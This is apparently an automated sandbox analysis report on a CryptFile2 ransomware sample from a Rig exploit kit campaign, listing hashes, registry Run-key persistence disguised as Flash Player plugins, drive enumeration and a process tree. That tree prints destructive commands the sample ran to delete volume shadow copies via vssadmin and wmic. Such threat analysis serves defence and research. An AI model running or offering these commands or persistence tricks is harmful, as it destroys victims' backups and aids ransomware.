Overview
overview
10Static
static
32016-08-26...e2.exe
windows7-x64
102016-08-30...e2.exe
windows7-x64
102016-09-14...re.exe
windows7-x64
102016-09-16...e2.exe
windows7-x64
102016-09-19...e2.exe
windows7-x64
102016-09-21...om.exe
windows7-x64
102016-09-27...er.exe
windows7-x64
72016-09-28...om.exe
windows7-x64
102016-09-28...om.exe
windows7-x64
102016-09-29...e2.exe
windows7-x64
102016-09-29...e2.exe
windows7-x64
102016-10-04...er.exe
windows7-x64
72016-10-05...e2.exe
windows7-x64
102016-10-06...e2.exe
windows7-x64
102016-10-12...er.exe
windows7-x64
72016-10-14...er.exe
windows7-x64
72016-10-18...e2.exe
windows7-x64
102016-10-23...er.exe
windows7-x64
72016-10-28...e2.exe
windows7-x64
102016-11-07...e2.exe
windows7-x64
102016-11-08...e2.exe
windows7-x64
102016-11-09...e2.exe
windows7-x64
102016-11-15...e2.exe
windows7-x64
102016-11-16...e2.exe
windows7-x64
102016-11-21...e2.exe
windows7-x64
102017-03-15...si.exe
windows7-x64
102017-04-07...re.exe
windows7-x64
102017-04-07...re.exe
windows7-x64
102017-04-07...re.exe
windows7-x64
102018-01-28...re.exe
windows7-x64
10Analysis
-
max time kernel
1561s -
max time network
1562s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
11-11-2024 07:17
Static task
static1
Behavioral task
behavioral1
Sample
2016-08-26-EITest-Rig-EK-payload-CryptFile2.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2016-08-30-EITest-Rig-EK-payload-CryptFile2.exe
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
2016-09-14-EITest-Rig-EK-payload-Bart-ransomware.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
2016-09-16-EITest-Rig-EK-payload-CryptFile2.exe
Resource
win7-20240903-en
Behavioral task
behavioral5
Sample
2016-09-19-EITest-Rig-EK-payload-CryptFile2.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
2016-09-21-EITest-Rig-EK-payload-CryptFile2-after-germansuppliesinc.com.exe
Resource
win7-20241023-en
Behavioral task
behavioral7
Sample
2016-09-27-Afraidgate-Rig-EK-payload-Locky-downloader.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
2016-09-28-EITest-Rig-EK-payload-CryptFile2-after-beyondrpoxy.com.exe
Resource
win7-20240903-en
Behavioral task
behavioral9
Sample
2016-09-28-EITest-Rig-EK-payload-CryptFile2-after-orfab.com.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
2016-09-29-EITest-Rig-EK-payload-1st-run-CryptFile2.exe
Resource
win7-20240903-en
Behavioral task
behavioral11
Sample
2016-09-29-EITest-Rig-EK-payload-8th-run-CryptFile2.exe
Resource
win7-20240729-en
Behavioral task
behavioral12
Sample
2016-10-04-Afraidgate-Rig-EK-payload-Locky-downloader.exe
Resource
win7-20240903-en
Behavioral task
behavioral13
Sample
2016-10-05-EITest-Rig-EK-payload-CryptFile2.exe
Resource
win7-20240708-en
Behavioral task
behavioral14
Sample
2016-10-06-EITest-Rig-EK-payload-second-run-CryptFile2.exe
Resource
win7-20240903-en
Behavioral task
behavioral15
Sample
2016-10-12-Afraidgate-Rig-EK-payload-locky-downloader.exe
Resource
win7-20241010-en
Behavioral task
behavioral16
Sample
2016-10-14-Afraidgate-Rig-EK-payload-Locky-downloader.exe
Resource
win7-20240903-en
Behavioral task
behavioral17
Sample
2016-10-18-EITest-Rig-EK-payload-CryptFile2.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
2016-10-23-Afraidgate-Rig-EK-payload-Locky-downloader.exe
Resource
win7-20240903-en
Behavioral task
behavioral19
Sample
2016-10-28-EITest-Rig-EK-payload-first-run-CryptFile2.exe
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
2016-11-07-EITest-Rig-EK-payload-CryptFile2.exe
Resource
win7-20240903-en
Behavioral task
behavioral21
Sample
2016-11-08-3rd-run-EITest-Rig-EK-payload-CryptFile2.exe
Resource
win7-20241010-en
Behavioral task
behavioral22
Sample
2016-11-09-1st-run-EITest-Rig-EK-payload-CryptFile2.exe
Resource
win7-20241023-en
Behavioral task
behavioral23
Sample
2016-11-15-2nd-run-Rig-standard-payload-CryptFile2.exe
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe
Resource
win7-20240903-en
Behavioral task
behavioral25
Sample
2016-11-21-2nd-run-EITest-Rig-standard-payload-CryptFile2.exe
Resource
win7-20240729-en
Behavioral task
behavioral26
Sample
2017-03-15-EITest-Rig-EK-payload-Revenge-ransomware-5uhcwesi.exe
Resource
win7-20240708-en
Behavioral task
behavioral27
Sample
2017-04-07-1st-run-EITest-HoeflerText-payload-Spora-ransomware.exe
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
2017-04-07-2nd-run-EITest-HoeflerText-payload-Spora-ransomware.exe
Resource
win7-20241010-en
Behavioral task
behavioral29
Sample
2017-04-07-3rd-run-EITest-HoeflerText-payload-Spora-ransomware.exe
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
2018-01-28-Seamless-campaign-Rig-EK-payload-GandCrab-ransomware.exe
Resource
win7-20241023-en
General
-
Target
2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe
-
Size
79KB
-
MD5
eb2972b9ac8a5db042cbadce971f64de
-
SHA1
40e03dde3562e379fa1be28f45eb36107c37c0de
-
SHA256
4b447266bd7a130c5b27c9ec4bd68a9ebf731a4ce0300702f41b37da1d6384ef
-
SHA512
10cdec84cd819270b57e37d730efe6fcd615adf744b54c0e9bf075fdf29067b4408748cb069750bb2067c1c569a1ff39c38f20f183a44c28e2c8e03d780e15ad
-
SSDEEP
1536:sRu6a2/bEPH2dFzd5Bsnu7jjd405wfGtu76KvJ:sRvdFR5Bsnu7jjKcYQY6KvJ
Malware Config
Extracted
C:\PerfLogs\Admin\# HELP_DECRYPT_YOUR_FILES #.TXT
Extracted
C:\Users\Admin\Desktop\# HELP_DECRYPT_YOUR_FILES #.TXT
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\FlashPlayerPlugins = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe\"" 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*FlashPlayersPlugin = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe\"" 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\FlashPlayarPlugins = "\"C:\\ProgramData\\FlashPlayerPlugin_1c9b74ea_de2b146b.exe\"" 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*FleshPlayarPlugins = "\"C:\\ProgramData\\FlashPlayerPlugin_1c9b74ea_de2b146b.exe\"" 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exedescription ioc Process File opened (read-only) \??\H: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\K: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\M: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\V: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\W: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\T: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\U: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\A: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\B: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\N: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\O: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\P: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\S: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\G: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\L: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\Y: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\Z: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\E: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\I: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\J: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\Q: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\R: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe File opened (read-only) \??\X: 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
vssadmin.execmd.execmd.exevssadmin.exevssadmin.exevssadmin.exevssadmin.execmd.execmd.execmd.execmd.exevssadmin.execmd.execmd.exevssadmin.exevssadmin.exevssadmin.execmd.exevssadmin.execmd.execmd.execmd.execmd.exevssadmin.execmd.exevssadmin.execmd.exevssadmin.exevssadmin.exevssadmin.execmd.exevssadmin.exe2016-11-16-4th-run-Rig-standard-payload-CryptFile2.execmd.exevssadmin.execmd.exevssadmin.execmd.execmd.exevssadmin.execmd.execmd.exenet.execmd.exevssadmin.execmd.execmd.execmd.execmd.exevssadmin.execmd.execmd.execmd.exevssadmin.execmd.execmd.execmd.execmd.exeNOTEPAD.EXEvssadmin.execmd.exevssadmin.exevssadmin.exenet1.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NOTEPAD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
Interacts with shadow copies 3 TTPs 27 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid Process 2672 vssadmin.exe 1872 vssadmin.exe 2584 vssadmin.exe 1484 vssadmin.exe 2828 vssadmin.exe 2308 vssadmin.exe 112 vssadmin.exe 1692 vssadmin.exe 3100 vssadmin.exe 2008 vssadmin.exe 1448 vssadmin.exe 2016 vssadmin.exe 628 vssadmin.exe 2644 vssadmin.exe 568 vssadmin.exe 2088 vssadmin.exe 608 vssadmin.exe 3092 vssadmin.exe 2804 vssadmin.exe 3000 vssadmin.exe 836 vssadmin.exe 2712 vssadmin.exe 848 vssadmin.exe 2000 vssadmin.exe 2752 vssadmin.exe 2184 vssadmin.exe 2788 vssadmin.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
WMIC.exevssvc.exevssvc.exedescription pid Process Token: SeIncreaseQuotaPrivilege 2848 WMIC.exe Token: SeSecurityPrivilege 2848 WMIC.exe Token: SeTakeOwnershipPrivilege 2848 WMIC.exe Token: SeLoadDriverPrivilege 2848 WMIC.exe Token: SeSystemProfilePrivilege 2848 WMIC.exe Token: SeSystemtimePrivilege 2848 WMIC.exe Token: SeProfSingleProcessPrivilege 2848 WMIC.exe Token: SeIncBasePriorityPrivilege 2848 WMIC.exe Token: SeCreatePagefilePrivilege 2848 WMIC.exe Token: SeBackupPrivilege 2848 WMIC.exe Token: SeRestorePrivilege 2848 WMIC.exe Token: SeShutdownPrivilege 2848 WMIC.exe Token: SeDebugPrivilege 2848 WMIC.exe Token: SeSystemEnvironmentPrivilege 2848 WMIC.exe Token: SeRemoteShutdownPrivilege 2848 WMIC.exe Token: SeUndockPrivilege 2848 WMIC.exe Token: SeManageVolumePrivilege 2848 WMIC.exe Token: 33 2848 WMIC.exe Token: 34 2848 WMIC.exe Token: 35 2848 WMIC.exe Token: SeBackupPrivilege 1936 vssvc.exe Token: SeRestorePrivilege 1936 vssvc.exe Token: SeAuditPrivilege 1936 vssvc.exe Token: SeIncreaseQuotaPrivilege 2848 WMIC.exe Token: SeSecurityPrivilege 2848 WMIC.exe Token: SeTakeOwnershipPrivilege 2848 WMIC.exe Token: SeLoadDriverPrivilege 2848 WMIC.exe Token: SeSystemProfilePrivilege 2848 WMIC.exe Token: SeSystemtimePrivilege 2848 WMIC.exe Token: SeProfSingleProcessPrivilege 2848 WMIC.exe Token: SeIncBasePriorityPrivilege 2848 WMIC.exe Token: SeCreatePagefilePrivilege 2848 WMIC.exe Token: SeBackupPrivilege 2848 WMIC.exe Token: SeRestorePrivilege 2848 WMIC.exe Token: SeShutdownPrivilege 2848 WMIC.exe Token: SeDebugPrivilege 2848 WMIC.exe Token: SeSystemEnvironmentPrivilege 2848 WMIC.exe Token: SeRemoteShutdownPrivilege 2848 WMIC.exe Token: SeUndockPrivilege 2848 WMIC.exe Token: SeManageVolumePrivilege 2848 WMIC.exe Token: 33 2848 WMIC.exe Token: 34 2848 WMIC.exe Token: 35 2848 WMIC.exe Token: SeBackupPrivilege 920 vssvc.exe Token: SeRestorePrivilege 920 vssvc.exe Token: SeAuditPrivilege 920 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2016-11-16-4th-run-Rig-standard-payload-CryptFile2.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 1708 wrote to memory of 2424 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 33 PID 1708 wrote to memory of 2424 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 33 PID 1708 wrote to memory of 2424 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 33 PID 1708 wrote to memory of 2424 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 33 PID 1708 wrote to memory of 1824 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 35 PID 1708 wrote to memory of 1824 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 35 PID 1708 wrote to memory of 1824 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 35 PID 1708 wrote to memory of 1824 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 35 PID 1708 wrote to memory of 1604 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 37 PID 1708 wrote to memory of 1604 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 37 PID 1708 wrote to memory of 1604 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 37 PID 1708 wrote to memory of 1604 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 37 PID 1708 wrote to memory of 2684 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 39 PID 1708 wrote to memory of 2684 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 39 PID 1708 wrote to memory of 2684 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 39 PID 1708 wrote to memory of 2684 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 39 PID 1708 wrote to memory of 2792 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 41 PID 1708 wrote to memory of 2792 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 41 PID 1708 wrote to memory of 2792 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 41 PID 1708 wrote to memory of 2792 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 41 PID 2424 wrote to memory of 2804 2424 cmd.exe 42 PID 2424 wrote to memory of 2804 2424 cmd.exe 42 PID 2424 wrote to memory of 2804 2424 cmd.exe 42 PID 2424 wrote to memory of 2804 2424 cmd.exe 42 PID 1824 wrote to memory of 2848 1824 cmd.exe 44 PID 1824 wrote to memory of 2848 1824 cmd.exe 44 PID 1824 wrote to memory of 2848 1824 cmd.exe 44 PID 1824 wrote to memory of 2848 1824 cmd.exe 44 PID 1604 wrote to memory of 2752 1604 cmd.exe 45 PID 1604 wrote to memory of 2752 1604 cmd.exe 45 PID 1604 wrote to memory of 2752 1604 cmd.exe 45 PID 1604 wrote to memory of 2752 1604 cmd.exe 45 PID 1708 wrote to memory of 2192 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 46 PID 1708 wrote to memory of 2192 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 46 PID 1708 wrote to memory of 2192 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 46 PID 1708 wrote to memory of 2192 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 46 PID 2684 wrote to memory of 2828 2684 cmd.exe 47 PID 2684 wrote to memory of 2828 2684 cmd.exe 47 PID 2684 wrote to memory of 2828 2684 cmd.exe 47 PID 2684 wrote to memory of 2828 2684 cmd.exe 47 PID 1708 wrote to memory of 2780 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 48 PID 1708 wrote to memory of 2780 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 48 PID 1708 wrote to memory of 2780 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 48 PID 1708 wrote to memory of 2780 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 48 PID 2792 wrote to memory of 3000 2792 cmd.exe 50 PID 2792 wrote to memory of 3000 2792 cmd.exe 50 PID 2792 wrote to memory of 3000 2792 cmd.exe 50 PID 2792 wrote to memory of 3000 2792 cmd.exe 50 PID 1708 wrote to memory of 2816 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 52 PID 1708 wrote to memory of 2816 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 52 PID 1708 wrote to memory of 2816 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 52 PID 1708 wrote to memory of 2816 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 52 PID 1708 wrote to memory of 2924 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 53 PID 1708 wrote to memory of 2924 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 53 PID 1708 wrote to memory of 2924 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 53 PID 1708 wrote to memory of 2924 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 53 PID 1708 wrote to memory of 2764 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 56 PID 1708 wrote to memory of 2764 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 56 PID 1708 wrote to memory of 2764 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 56 PID 1708 wrote to memory of 2764 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 56 PID 1708 wrote to memory of 2664 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 59 PID 1708 wrote to memory of 2664 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 59 PID 1708 wrote to memory of 2664 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 59 PID 1708 wrote to memory of 2664 1708 2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe 59 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe"C:\Users\Admin\AppData\Local\Temp\2016-11-16-4th-run-Rig-standard-payload-CryptFile2.exe"1⤵
- Adds Run key to start application
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin.exe Delete Shadows /All /Quiet2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2804
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=Z: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=Z: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2752
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=Y: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=Y: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2828
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=X: /All /Quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=X: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:3000
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=W: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2192 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=W: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2308
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=V: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2780 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=V: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2644
-
-
-
